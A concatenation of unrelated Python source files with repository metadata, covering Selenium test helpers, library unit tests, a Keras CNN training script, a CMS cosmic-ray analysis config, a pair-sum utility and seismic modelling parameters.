b13b4d3b13b0518c818531117f412a5f56a71c10 | 74a6414e6ea1af00d66ba92f0a62e3a6eaf0fff9 | /public/publicMethod.py | 0483fb9fd6706f6c46310c80fc69a9d083fd9d5a | [] | no_license | blanchede/jobtest | 717b586852fe669d49efc8e98cddc5f7511899f2 | 16e354a4673c236af55e29a2964162ec43e91e92 | refs/heads/master | 2021-01-01T17:51:50.999708 | 2017-07-28T07:01:49 | 2017-07-28T07:01:49 | 98,182,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,612 | py | #!/user/bin/env python
# -*-coding:utf-8-*-
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
from time import sleep
#启动chromdriver
driver = webdriver.Remote(command_executor='http://localhost:9515',
desired_capabilities=DesiredCapabilities.CHROME)
#测试地址
#testUrl="http://devtest.leadswarp.com"
testUrl="http://localhost:4200/"
#testUrl="http://106.14.139.106:80"
#登录需要信息
#测试用户名和密码
userName = "[email protected]"
password = "demo"
#登录按钮XPath
loginXpath = "/html/body/app-root/app-login/div/div/div/div[2]/form/button"
#主界面联系人按钮
contactXpath = "//li[3]/div/a/i"
settingXpath = "//a[@title='设置']/parent::div"
#测试分组固定信息
targetGroupName = "targetGroupTest1"
folderName = "folderTest1"
newTargetGroupName = "targetGroupTest2"
newFolderName = "folderTest2"
#公用方法 元素是否存在
class CommonMethod():
def isElementExist(Xpath):
s = driver.find_elements(By.XPATH, Xpath)
if len(s) == 0:
print("元素未找到:%s" % Xpath)
return False
elif len(s) == 1:
return True
else:
print("找到%s个元素:%s" % (len(s), Xpath))
return False
def is_element_present(self, what):
try:
self.driver.find_element(By.XPATH, what)
except NoSuchElementException as e:
return False
return True
| [
"[email protected]"
] | |
1bcdd525c0ab3623c6d017154cb036bf15b79a66 | 3950896bb3dcf9a03a9682a17b42bfa3feda3885 | /src/vaytrou/vaytrou/tests.py | d931ef4e7366752af20398333357cc1120abb5ae | [] | no_license | sgillies/vaytrou | c02c38579565ddb0d1782600537113e9eafb38b0 | 89385800491f36a774e8fc4eddd79952a982f115 | refs/heads/master | 2016-09-09T22:54:00.789976 | 2013-06-21T23:29:19 | 2013-06-21T23:29:19 | 884,337 | 2 | 1 | null | 2016-02-26T00:04:56 | 2010-09-02T20:59:45 | Python | UTF-8 | Python | false | false | 1,063 | py | import shutil
import tempfile
import vaytrou.admin
# Admin tests
def test_admin():
admin = vaytrou.admin.IndexAdmin()
def foo(*args):
pass
admin.foo = foo
admin.run(['foo', 'bar', 'x'])
admin.run(['help', 'info'])
admin.run(['info', '--help'])
def test_ro_commands():
data = tempfile.mkdtemp()
admin = vaytrou.admin.IndexAdmin()
admin.run(['-d', data, 'create', 'foo'])
admin.run(['-d', data, 'info', 'foo'])
admin.run(['-d', data, 'dump', 'foo'])
admin.run(['-d', data, 'search', 'foo', '--', '0,0,0,0'])
shutil.rmtree(data)
def test_batch():
data = tempfile.mkdtemp()
admin = vaytrou.admin.IndexAdmin()
admin.run(['-d', data, 'create', 'foo'])
admin.run(['-d', data, 'batch', 'foo', '-f', 'index-st99_d00.json'])
admin.run(['-d', data, 'dump', 'foo'])
shutil.rmtree(data)
def test_pack():
data = tempfile.mkdtemp()
admin = vaytrou.admin.IndexAdmin()
admin.run(['-d', data, 'create', 'foo'])
admin.run(['-d', data, 'pack', 'foo'])
shutil.rmtree(data)
| [
"[email protected]"
] | |
8a7403ed5ad850d888a8b77975d30d6748ac5cfd | 38d00b7c5335ecfeee9cd8efdc0d5526ac60102c | /lenskit/algorithms/tf/__init__.py | dc8c5ce09959e2b4f476bf9f2d8171857ee515fb | [
"MIT"
] | permissive | carlos10seg/lkpy | ce07791f241099a4c1e844ba802c7da37e379fb7 | 7bb2b78a5315a19a182a3d64995c48dbbd42d9d8 | refs/heads/master | 2023-01-19T02:04:57.192293 | 2020-11-24T00:06:39 | 2020-11-24T00:06:39 | 266,886,328 | 0 | 0 | MIT | 2020-11-23T23:50:32 | 2020-05-25T21:45:48 | Python | UTF-8 | Python | false | false | 500 | py | """
TensorFlow-based algorithms.
"""
import logging
from .util import have_usable_tensorflow
from .biasedmf import BiasedMF # noqa: F401
from .ibmf import IntegratedBiasMF # noqa: F401
from .bpr import BPR # noqa: F401
from lenskit.util.parallel import is_mp_worker
TF_AVAILABLE = have_usable_tensorflow()
_log = logging.getLogger(__name__)
if TF_AVAILABLE and is_mp_worker():
_log.info('disabling GPUs in worker process')
    import tensorflow as _tf  # safe here: TF_AVAILABLE above confirmed TensorFlow imports
    _tf.config.set_visible_devices([], 'GPU')
| [
"[email protected]"
] | |
0878fdbae5fcd996435a304fd52aa773374222d7 | 90c6262664d013d47e9a3a9194aa7a366d1cabc4 | /tests/storage/cases/test_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE.py | 4e3422ecc498a42b1713e07178bccf64f7472514 | [
"MIT"
] | permissive | tqtezos/pytezos | 3942fdab7aa7851e9ea81350fa360180229ec082 | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | refs/heads/master | 2021-07-10T12:24:24.069256 | 2020-04-04T12:46:24 | 2020-04-04T12:46:24 | 227,664,211 | 1 | 0 | MIT | 2020-12-30T16:44:56 | 2019-12-12T17:47:53 | Python | UTF-8 | Python | false | false | 1,130 | py | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE.json')
def test_storage_encoding_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1NyvbQNkxTVanX4BHohcJ64NyA68ZgQfzE(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| [
"[email protected]"
] | |
88b2ed689b8e719c2649a84df2cfec7bea1dc0c8 | 4e2b98c0cc67c447ea1421ae6fbe38842e354024 | /train_fuits.py | b3e5807f651762b98847abbe4d55fb2c87e7c1af | [] | no_license | rancher43/fruit_mnist | 6c5e3e5f8005de03dd50c1d4fbe78742eac61ce8 | 34c487352f2e4f7d2172fa16539249ce9a7378de | refs/heads/master | 2022-04-13T05:31:35.598412 | 2020-04-10T20:01:07 | 2020-04-10T20:01:07 | 254,723,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,464 | py | import tensorflow as tf
import numpy as np
from tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPool2D, Dropout
from tensorflow.keras import Model
import pickle
print('tensorflow version: ' + tf.__version__)
train_images_file = open('train_images', 'rb')
train_images = pickle.load(train_images_file)
train_images_file.close()
train_labels_file = open('train_labels', 'rb')
train_labels = pickle.load(train_labels_file)
train_labels_file.close()
train_ds = tf.data.Dataset.from_tensor_slices((train_images, train_labels)).shuffle(10000).batch(32)
# print(train_ds)
del train_images
del train_labels
import gc
gc.collect()
class CNNModel(Model):
def __init__(self):
super(CNNModel, self).__init__()
self.conv1 = Conv2D(32, 3, padding='same', activation='relu')
self.pool1 = MaxPool2D((2, 2))
self.conv2 = Conv2D(64, 3, padding='same', activation='relu')
self.pool2 = MaxPool2D((2, 2))
self.flatten = Flatten()
self.d1 = Dense(512, activation='relu')
self.dropout1 = Dropout(0.4)
self.d2 = Dense(128, activation='relu')
self.dropout2 = Dropout(0.4)
self.d3 = Dense(3, activation='softmax')
def call(self, x):
x = self.conv1(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.pool2(x)
x = self.flatten(x)
x = self.d1(x)
x = self.dropout1(x)
x = self.d2(x)
x = self.dropout2(x)
x = self.d3(x)
return x
model = CNNModel()
loss_object = tf.keras.losses.CategoricalCrossentropy()
optimizer = tf.keras.optimizers.Adam()
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.CategoricalAccuracy(name='train_accuracy')
@tf.function
def train_step(images, labels):
with tf.GradientTape() as tape:
predictions = model(images)
loss = loss_object(labels, predictions)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train_loss(loss)
train_accuracy(labels, predictions)
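# Note (added): @tf.function traces train_step into a graph; the GradientTape
# records the forward pass so tape.gradient can backpropagate the loss into
# model.trainable_variables before the Adam optimizer applies the update.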
epochs = 5
for epoch in range(epochs):
for images, labels in train_ds:
train_step(images, labels)
model.save_weights('saved_models', save_format='tf')
print('Epoch: ' + str(epoch + 1) + ' Loss: ' + str(train_loss.result()), ' Acc: ' + str(train_accuracy.result() * 100))
train_loss.reset_states()
train_accuracy.reset_states() | [
"[email protected]"
] | |
4e14132c8dedc644bde9ccf908cbbd5f2ed82839 | d8797e2aaf814a25282f036065e7f5cc4ccf5450 | /3. PyTorch/tutorial/gradient2.py | 7de9a983b513cc703cc4fda0e0816e03cacd8c60 | [] | no_license | ddubbu/AI-Study-with-python | 8b38c5f679795899238ccfbd7965ef26d3e0e695 | efc05c9977803fc1990e3dbec35541591d165155 | refs/heads/master | 2020-12-05T21:49:16.973179 | 2020-08-22T13:11:16 | 2020-08-22T13:11:16 | 232,256,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | import torch
from torch.autograd import Variable
a = torch.rand(5)
print(a)
a = Variable(a)
print(var) | [
"[email protected]"
] | |
1f0b37159950fd92ee3d274aefba1b34e7bc80ce | 4703b990612ece92825eec4ad7608ce8fd563f4e | /src/server_handler/definitions.py | 052504276a4a1b3df71196ccde5f624fd125f36d | [
"MIT"
] | permissive | robertpardillo/Funnel | 69a270ee722f05e6a23eb27d7b3268f916a0d9f8 | f45e419f55e085bbb95e17c47b4c94a7c625ba9b | refs/heads/master | 2020-03-08T10:15:24.458019 | 2018-04-04T13:52:04 | 2018-04-04T13:52:04 | 128,068,139 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py |
import os
ROOT_DIR = os.path.abspath(os.path.dirname(__file__))
SERVER = 'handler'
IS_MULTITHREADING = 0
| [
"[email protected]"
] | |
fb3e3789a52522a4deefa049a55718abb44cd51a | 6aa9c8841ab3b86394dff1378106b4c9da57f772 | /scripts/plot_trips.py | 855638163a1c9028e1702d3f4becf51011ab686d | [] | no_license | dmulholl/taxisim | e185abbfa6dd4c15b10c5c34ee776b3f9911b391 | d5cc4a097fede2a2aab528a5cc649ee99d0e290e | refs/heads/master | 2021-03-05T20:46:13.953842 | 2020-08-05T22:47:43 | 2020-08-05T22:47:43 | 252,199,551 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 913 | py | #! /usr/bin/env python3
# ----------------------------------------------------------------------------------------
# This script plots a bar chart showing total daily trip numbers for February 2016
# (08:00 to 12:00).
# ----------------------------------------------------------------------------------------
import matplotlib.pyplot as plt
days = range(1, 30)
labels = [str(day) for day in days]
requests = [
60540, 67177, 70058, 70098, 66502, 53920, 44211, 64821, 68903, 71095, 76731,
73807, 58257, 52000, 58077, 69393, 68484, 70557, 68709, 52110, 46004, 62088,
73405, 78445, 68933, 72920, 57357, 44968, 64270,
]
fig, ax = plt.subplots(figsize=(10,5))
ax.bar(days, requests, width=0.9, tick_label=labels)
ax.set_xlabel("Day (February 2016)", fontweight='bold', labelpad=10)
ax.set_ylabel("Number of Trips", fontweight='bold', labelpad=10)
plt.tight_layout()
plt.show()
fig.savefig("image.eps")
| [
"[email protected]"
] | |
72390b880a83eaa83dcc10b3c8aa9ade7d362a74 | 043a17d196250048a5a34e990a19d8622436f9ce | /trainingday04/apple_pineapple/pikotaro.py | 7eca21f43e639d92300bf23bc479ac724ba2c319 | [] | no_license | chimtrangbu/hyperspace | 8df8cb9c5475b70b218d0a56034c7f520815fa0d | ec49324c705e9af61c3857cf2dea2a551bda5537 | refs/heads/master | 2020-03-26T07:18:34.249976 | 2018-12-20T05:16:55 | 2018-12-20T05:16:55 | 144,647,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 537 | py | # Creating a function for return lyrics of pineapple pen
def apple_pen(first_ingredient, second_ingredient):
des = ['I have a pen, I have a apple\nUh! Apple-Pen!']
des.append('I have a pen, I have a pineapple\nUh! Pineapple-Pen!')
des.append('I have a pen, I have a pen\nUh! Long pen!')
dic = [['pen', 'apple'], ['pen', 'pineapple'], ['pen', 'pen']]
inp = [first_ingredient, second_ingredient]
for i in range(3):
if dic[i] == inp:
return des[i]
raise ValueError('It is not in the lyrics')
| [
"[email protected]"
] | |
3b85f1cf324080852822ab4ad0d215c4ba3c2e10 | 666e6233275d23dda84a24fa55aa38243ec91536 | /src/toolshelf/commands/pull.py | cbd24b00f1060b32a525213163e46711a39faee9 | [
"MIT"
] | permissive | catseye/toolshelf | 5f4dbf8902ddbe4c3fcb2d240fc5b3a977ed2cb0 | d597455a57610d34658fa37a3ec8c780996cd65f | refs/heads/master | 2020-12-24T06:02:39.836314 | 2017-05-31T13:42:36 | 2017-05-31T13:42:36 | 4,310,103 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | """
Pull latest revision of specified sources from each's upstream repository.
Upstream repo is always the external source from which
it was originally docked. Does not work on distfile-based sources.
pull {<docked-source-spec>}
"""
# TODO: figure out how to propogate was_changed to a subsequent 'build'
from toolshelf.toolshelf import BaseCommand
class Command(BaseCommand):
def show_progress(self):
return False
def perform(self, shelf, source):
source.update()
| [
"[email protected]"
] | |
4034376ae7eccd5f9a0ccefb3a5ca1d3a8526926 | 023fc76dfce8366062028d386bdb08407d2bec79 | /src/custom_extension_davidlopes.py | 40b4a8f9d715eb5cf7bd57990ae74b75346b77c8 | [] | no_license | dlopes7/accenture-training-plugins | 60fb0c6a83e73cc3f9039d704f7b02f66dedd1a5 | 931f0592c3a109452fe4069b8e9bd577511a9fa2 | refs/heads/master | 2022-10-08T15:41:47.103779 | 2020-06-05T19:33:53 | 2020-06-05T19:33:53 | 269,724,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | import requests
import logging
from ruxit.api.base_plugin import RemoteBasePlugin
log = logging.getLogger(__name__)
class CustomExtensionDavidLopes(RemoteBasePlugin):
def query(self, **kwargs):
meu_nome = "David Lopes"
log.info("Extension executando!")
grupo = self.topology_builder.create_group(f"{meu_nome} - SpaceX", f"{meu_nome} - SpaceX")
navios = self.get_ships()
for navio in navios:
log.info(navio["ship_name"])
# Cria o custom device
id_navio = f'{meu_nome} {navio["ship_id"]}'
nome_navio = f'{meu_nome} {navio["ship_name"]}'
device = grupo.create_device(id_navio, nome_navio)
# Manda uma métrica absoluta (simples)
device.absolute("combustivel", navio["fuel"])
# Métrica com dimensões
for motor in navio["thrust"]:
device.absolute("potencia", motor["power"], dimensions={"Motor": motor["engine"]})
# Propriedades
device.report_property("Tipo", navio.get("ship_type", "Desconhecido"))
device.report_property("Porto", navio.get("home_port", "Desconhecido"))
# Topologia
device.add_endpoint(navio["ship_ip"])
# Statetimeseries
device.state_metric("clima", navio["weather"])
def get_ships(self):
return requests.get(f"{self.config['url']}/v3/ships").json()
| [
"[email protected]"
] | |
d0bdbe1317c6e8a5e655d4787ab7aea35fc7499d | 8469f426b47222d8f0c82c5f05131e61ea7bf623 | /uri1001/uri1012.py | 0df10d3a5b09693f89d938cdeb6e5bbf558eed07 | [] | no_license | jamil2gomes/uri-python | 493b07448fc9ddc9e86ae30808c0cd7465444281 | db3c9ae4dac93c4c03c040ee46a74a6c5987bc11 | refs/heads/master | 2020-08-23T07:18:13.146535 | 2019-10-26T01:59:46 | 2019-10-26T01:59:46 | 216,568,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | valor = input().split(" ")
a, b, c = valor
pi = 3.14159
triangulo = (float(a) * float(c)) / 2
circulo = pi * (pow(float(c), 2))
trapezio = float(c) * (float(a) + float(b)) / 2
quadrado = pow(float(b), 2)
retangulo = float(a) * float(b)
print("TRIANGULO: {:.3f}"
"\nCIRCULO: {:.3f}"
"\nTRAPEZIO: {:.3f}"
"\nQUADRADO: {:.3f}"
"\nRETANGULO: {:.3f}".format(triangulo, circulo, trapezio, quadrado, retangulo))
| [
"[email protected]"
] | |
a87fd4041d854f92d11a7ddf1b81ef9d504287d2 | bd5810c2eeafea74b6d0a3b1017297a69165e487 | /Python/list_pair_to_sum/PairToSumFunctions.py | 2f0c1a75aa30a77897cd46928e34815646b29c1f | [] | no_license | kpalmberg/Programming | e8d18ec3c0ee50ce72052be2a6170bf35df2b7d7 | c8dd5dad081e0682489af84e41c26d823eee0418 | refs/heads/master | 2020-04-05T20:01:40.614465 | 2018-11-29T10:17:12 | 2018-11-29T10:17:12 | 157,161,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,145 | py | class PairFunctions:
# Function to determine is a pair exists in the SORTED list which adds to the sum
# Linear time: O(n)
@staticmethod
def pairExistsWithSum_SortedList(sortedList, sum):
low = 0
high = len(sortedList) - 1
while low < high:
currentPairSum = sortedList[low] + sortedList[high]
if currentPairSum == sum:
return True
elif currentPairSum < sum:
low += 1
elif currentPairSum > sum:
high -= 1
return False
# Function to determine is a pair exists in the unsorted/sorted list which adds to the sum
# This method is cleaner code & can deal with an unsorted list as opposed to SortedList method
# Linear time: O(n)
@staticmethod
def pairExistsWithSum_unsortedOrSortedList(L1, sum):
compliment = []
for item in L1:
if item in compliment:
return True
compliment.append(sum - item)
return False
# Returns the index of the first pair in a list that adds to the sum, instead of returning a bool
# Runs in Linear time O(n)
@staticmethod
def getIndexesOfSumPair(nums, sum):
dict = {} # Hold compliments and their indexes
for index, num in enumerate(nums):
if sum - num in dict: # If the compliment for our current num exists in the dictionary
# Return the value of the compliment in our dictionary (its index), & our current index
return [dict[sum - num], index]
dict[num] = index # Add each number at its index to our dictionary
# Returns bool if pairs exists or not. Utilizes dictionary instead of list, & enumeration
# Runs in Linear time O(n)
@staticmethod
def getPairEqualSumResult(nums, sum):
dict = {} # Hold compliments and their indexes
for index, num in enumerate(nums):
if sum - num in dict: # If the compliment for our current num exists in the dictionary
return True # return True
dict[num] = index # Add each number at its index to our dictionary
return False
# Returns tuple. Tuple includes bool if pair exists with sum, AND the indexes of where the pair exists
# We could just call our getPairEqualsSumResult & getIndexesOfSumPair functions, but that would require
# more work to be done for the result. Runs in Linear time O(n)
@staticmethod
def getCompletePairEqualSumResults(nums, sum):
dict = {} # Hold compliments and their indexes
for index, num in enumerate(nums):
if sum - num in dict: # If the compliment for our current num exists in the dictionary
return True, [dict[sum - num], index]
dict[num] = index # Add each number at its index to our dictionary
return False
if __name__ == '__main__':
L0 = [1, 4, 6, 2, 8] # true expectation
sum = 12
test = PairFunctions.getCompletePairEqualSumResults(L0, sum)
print(test)
print("Entering list L0")
#print(pairExistsWithSum_SortedList(L0, sum), "\n")
| [
"[email protected]"
] | |
4d06f0fef0a49eaa87c617682a91228e07778e96 | a812e3953ff8da2e1f0eaecb69e09628366ca4ed | /session18/wordcount/urls.py | a61fbead0635aa95f1e10516733163f7bb4bce30 | [] | no_license | marobew/project | 999c45d0b2c7d1f1f1446d000673bef5924f0a65 | f20580a542acb4b64aea035f0fe812dcaca68437 | refs/heads/master | 2020-06-19T22:26:09.581459 | 2019-07-16T14:41:44 | 2019-07-16T14:41:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | from django.urls import path
from . import views
urlpatterns = [
path('count/', views.count, name='count'),
path('result/', views.result, name='result'),
] | [
"[email protected]"
] | |
91d50cf45a97dacfbb3c939c17de07a29a3a08ad | 16ea89da61e52d75239286851b7b2fa98c3024a3 | /CosmicAnalysis/test/runCosmicAnalysis.py | 0d50e9cfcd35b815280922045d7b2f74eaa65a5c | [] | no_license | watson-ij/CosmicAnalysis | 67492bf1bb3318429a604c5588fee9bafdbb0900 | a3b2887523930a1da781fa73f575b37785b2b174 | refs/heads/master | 2023-06-09T03:05:44.908091 | 2021-07-02T05:33:23 | 2021-07-02T05:33:23 | 381,917,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,888 | py | import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('CosmicAnalysis',eras.Run3)
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('RecoMuon.TrackingTools.MuonServiceProxy_cff')
process.load('TrackingTools.TransientTrack.TransientTrackBuilder_cfi')
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '113X_dataRun3_Prompt_v2', '')
process.MessageLogger.cerr.FwkReport.reportEvery = 5000
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
#process.maxEvents.input = cms.untracked.int32(10)
# Input source
process.source = cms.Source("PoolSource", fileNames = cms.untracked.vstring())
process.source.skipEvents = cms.untracked.uint32(0)
from glob import glob
process.source.fileNames.extend(
# ['/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/007c63b2-8625-44ed-b1e6-a13ee77f2a42.root'],
[f.replace('/eos/cms','') for f in glob('/eos/cms/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/*')]
# [('file:'+f) for f in glob('/eos/cms/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/*')][:5]
)
process.options = cms.untracked.PSet()
process.TFileService = cms.Service("TFileService",fileName = cms.string("cosmics.root"))
process.CosmicAnalysis = cms.EDAnalyzer('CosmicAnalysis',
process.MuonServiceProxy,
gemRecHits = cms.InputTag("gemRecHits"),
cscSegments = cms.InputTag("cscSegments"),
muons = cms.InputTag("muons"),
)
process.p = cms.Path(process.CosmicAnalysis)
| [
"[email protected]"
] | |
a0af7a358d5cf743246b22a5c21c9a74cf6da2de | e4920699d195c1a831d90e9f5470df71648943bf | /lists/urls.py | 671dc88708da597a71c7e5c24a595589fda3ae54 | [] | no_license | kuchichan/test_goat | b27ff4b8b94fb3b95c1d26e52337d4cbd1475dcf | 603d2f09d4368fb6893541a81daa23b09f621e64 | refs/heads/master | 2021-07-11T12:45:02.067314 | 2020-09-19T22:12:53 | 2020-09-19T22:12:53 | 204,347,922 | 0 | 1 | null | 2019-11-17T13:12:18 | 2019-08-25T20:46:09 | Python | UTF-8 | Python | false | false | 1,039 | py | """superlists URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from lists import views
urlpatterns = [
url(r'^new$', views.NewListView.as_view(), name='new_list'),
url(r'^(?P<pk>\d+)/$', views.ViewAndAddToList.as_view(),
name='view_list'),
url(r'^(?P<pk>\d+)/share/$', views.ShareListView.as_view(), name='share_list'),
url(r'^users/(?P<email>.+)/$', views.MyListsView.as_view(), name='my_lists'),
]
| [
"[email protected]"
] | |
01945a6a9fe9671dde25ee92c1525856eac4cfcc | 12f6466ba8fad1293e78ee123ad56938bd515a16 | /and_or.py | 61febdeeaae77f6e04f213087888888a5d958498 | [] | no_license | greshem/develop_python | 9dd1eaac4137b0c5b5b9f822bba07a8d6fa0f9ae | ddd370a35c63a89c5885f0918e3fe1d44c2a3069 | refs/heads/master | 2021-01-19T01:53:09.502670 | 2017-10-08T12:14:33 | 2017-10-08T12:14:33 | 45,077,612 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | import os
import re
if not os.path.exists("test4.py") and not 0:
print "There is no gtest.zip"
def check_env():
if 1==find_bake and 1==find_vc2003:
return 1
else:
return 0
| [
"[email protected]"
] | |
c9377460124a516d9b3e84d11eb0cd06931ea316 | 0fd5793e78e39adbfe9dcd733ef5e42390b8cc9a | /python3/06_Collections/04_Dictionaries/m_dict_deepcopy.py | f87a64bcfe2a9745cf195aea1c8c7a956c93a781 | [] | no_license | udhayprakash/PythonMaterial | 3ea282ceb4492d94d401e3bc8bad9bf6e9cfa156 | e72f44e147141ebc9bf9ec126b70a5fcdbfbd076 | refs/heads/develop | 2023-07-08T21:07:33.154577 | 2023-07-03T10:53:25 | 2023-07-03T10:53:25 | 73,196,374 | 8 | 5 | null | 2023-05-26T09:59:17 | 2016-11-08T14:55:51 | Jupyter Notebook | UTF-8 | Python | false | false | 742 | py | import copy
from pprint import pp
payload = {
"DOB": "-",
"age": 25,
"education": {"college": "Yale", "highschool": "N/A"},
"hobbies": ["running", "coding", "-"],
"name": {"first": "Robert", "last": "Smith", "middle": ""},
}
pp(payload)
payload1 = copy.deepcopy(payload)
for key, value in payload.items():
if isinstance(value, (str, int, float)):
if value in ("N/A", "-", ""):
del payload1[key]
elif isinstance(value, list):
payload1[key] = [s_val for s_val in value if not (value in ("N/A", "-", ""))]
elif isinstance(value, dict):
for skey, sval in value.items():
if sval in ("N/A", "-", ""):
del payload1[key][skey]
print()
pp(payload1)
| [
"[email protected]"
] | |
dafd4069662cee4fb9446b0d89b3fa38abdc8f5d | 1cc638da0163ca7c8578b659fc0b067cc5d25265 | /server/migrations/versions/e160191ff485_.py | 8740099a7a050a53d9abd8c8b681bb46f187453a | [] | no_license | netang/label-it | a2591d456c8ed5c539bb2f0bf93caf2c3ef94d0c | 1e9ac5d1040b0c49af7c1838e43a010c45378d13 | refs/heads/master | 2023-01-13T01:02:56.943956 | 2020-01-25T15:45:05 | 2020-01-25T16:08:13 | 212,176,509 | 0 | 0 | null | 2023-01-04T22:12:51 | 2019-10-01T18:59:44 | Python | UTF-8 | Python | false | false | 711 | py | """empty message
Revision ID: e160191ff485
Revises:
Create Date: 2019-10-05 18:20:06.893067
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e160191ff485'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('tasks',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('tasks')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
51a0ebcdec898e707954df31f6137beb9cc47715 | e374785dd48ab3d3d8306c10b788983c2f2ac2e3 | /search_old/urls.py | 3dab893ca9935dc903b1902f04f567488d897a19 | [
"MIT"
] | permissive | common1/newassetcms | 0fd5ca2b310ccbd1f2ae432490b91ff22d352e2e | 65eee3c2ed9dac4cc56bfff863a6cbaff9830d26 | refs/heads/master | 2022-12-15T22:17:45.613715 | 2019-07-25T05:54:46 | 2019-07-25T05:54:46 | 186,583,756 | 0 | 0 | MIT | 2022-12-08T05:06:46 | 2019-05-14T08:54:19 | Python | UTF-8 | Python | false | false | 201 | py | from django.conf.urls import url
from django.urls import path
from .views import (
SearchAssetView,
)
app_name = 'search'
urlpatterns = [
path('', SearchAssetView.as_view(), name='query'),
]
| [
"[email protected]"
] | |
2f5d8559d038f71c467a9850b0d3b57bb4ada4c4 | 5d6140bde09548c43965c11ad1ab50237671e1f8 | /Denise/par_example.py | 6351adafbb5be520bdb508c3f5f4bccc88c6f929 | [] | no_license | wyzhang120/GeophyPkgTools | fb27e44c0a550b5b83ab9bfd59b39d4e0a108c2d | b8233798573ddeb72ae0d81897ca64955818d3c5 | refs/heads/master | 2022-06-09T01:25:20.638459 | 2020-05-06T05:49:42 | 2020-05-06T05:49:42 | 223,804,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,547 | py | import os
import numpy as np
import PkgTools.Denise.denise_out as deniseIO
from PkgTools.Denise.utils_denise import AcqCw2, print_factors, write_mfile
from PkgTools.TOY2DAC_marm.utils_marmousi_cw import crop_mamousi
from utils_model_building.util_model_building import mod2d
from sympy.ntheory import factorint
basedir = '/project/stewart/wzhang/src/DENISE-Black-Edition/par_fdtest'
fmodel = 'CW_fdtest'
fdenise_input = '{:s}.inp'.format(fmodel)
fsrc = '{:s}_src.txt'.format(fmodel)
frec = '{:s}_rec'.format(fmodel)
fd_order = 8
# Mamousi
segydir = '/project/stewart/wzhang/TOY2DAC/crosswell_toy2dac/FWI/Mamousi/model_full'
fvp = 'MODEL_P-WAVE_VELOCITY_1.25m.segy' # unit = m/s
fvs = 'MODEL_S-WAVE_VELOCITY_1.25m.segy'
frho = 'MODEL_DENSITY_1.25m.segy' # unit = g/cc
dxSgy = 1.25
npml = 20
dpml = npml * dxSgy
x0 = 9100 - dpml
x1 = 9600 + dpml - dxSgy
z0 = 1600 - dpml
z1 = 2600 + dpml - dxSgy
fc = 80 # fmax = 2.76 * fc
srctype = 1 # 1=explosive, 2=point force in x, 3=point force in z, 4=custom directive force
acqOffset = 25 + dpml # unit = m, dx = 1.25
acqDz = 100
tmax = 2.
